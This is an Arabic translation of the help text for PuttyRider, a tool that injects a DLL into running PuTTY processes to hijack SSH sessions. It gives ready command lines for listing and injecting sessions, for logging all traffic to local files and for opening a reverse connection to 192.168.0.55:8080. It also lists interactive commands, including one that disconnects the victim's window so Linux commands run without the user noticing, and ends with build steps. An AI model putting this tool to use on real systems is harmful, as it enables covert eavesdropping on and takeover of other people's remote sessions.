
اختطف جلسات Putty لاستراق محادثة وحقن أوامر Linux.
اختطاف جلسات Putty من أجل التنصت على المحادثة وحقن أوامر Linux.
سرد عمليات Putty الموجودة وحالتها (محقونة / غير محقونة)
PuttyRider.exe -l
حقن DLL في أول putty.exe تم العثور عليه وبدء اتصال عكسي من DLL إلى عنوان IP الخاص بي:المنفذ، ثم الخروج من PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
التشغيل في الخلفية وانتظار عمليات Putty جديدة. الحقن في أي putty.exe جديد وكتابة جميع المحادثات في ملفات محلية.
PuttyRider.exe -w -f
إخراج PuttyRider.dll من جميع عمليات Putty التي تم حقنها فيها بالفعل. (لا تنس إيقاف PuttyRider.exe إذا كان يعمل في وضع -w، وإلا فسيتم حقنها مرة أخرى.)
PuttyRider.exe -x
أوضاع التشغيل:
-l سرد عمليات Putty الجارية واتصالاتها
-w الحقن في جميع جلسات Putty الموجودة وانتظار جلسات جديدة
للحقن فيها أيضًا
-p PID الحقن فقط في جلسة Putty الموجودة والمعرفة بواسطة PID.
إذا كان PID==0، فالحقن في أول Putty يتم العثور عليه
-x التنظيف. إزالة DLL من جميع حالات Putty الجارية
-d وضع التصحيح. يعمل فقط مع وضع -p
-c CMD تنفيذ أمر Linux تلقائيًا بعد الحقن الناجح
سيقوم PuttyRider بإزالة المسافات الزائدة وحرف '&' من CMD
سيقوم PuttyRider بإضافة: " 1>/dev/null 2>/dev/null &" إلى CMD
-h طباعة هذه المساعدة
أوضاع الإخراج:
-f كتابة جميع محادثات Putty إلى ملف في الدليل المحلي.
سيكون اسم الملف برقم PID الخاص بـ putty.exe الحالي مضافًا إليه
-r IP:PORT بدء اتصال عكسي إلى الجهاز المحدد و
بدء جلسة تفاعلية.
الأوامر التفاعلية (بعد تلقي اتصال عكسي):
!status معرفة ما إذا كانت نافذة Putty متصلة بإدخال المستخدم
!discon فصل نافذة Putty الرئيسية حتى لا تعرض أي شيء
هذا مفيد لإرسال الأوامر دون أن يلاحظ المستخدم
!recon إعادة توصيل نافذة Putty إلى وضع التشغيل العادي
CMD أوامر شل Linux
!exit إنهاء هذا الاتصال
!help عرض المساعدة لاتصال العميل
استخدم موجه أوامر Visual Studio:
nmake main dll
شكرًا لـ Brett Moore من Insomnia Security على إثباته لمفهوم PuttyHijack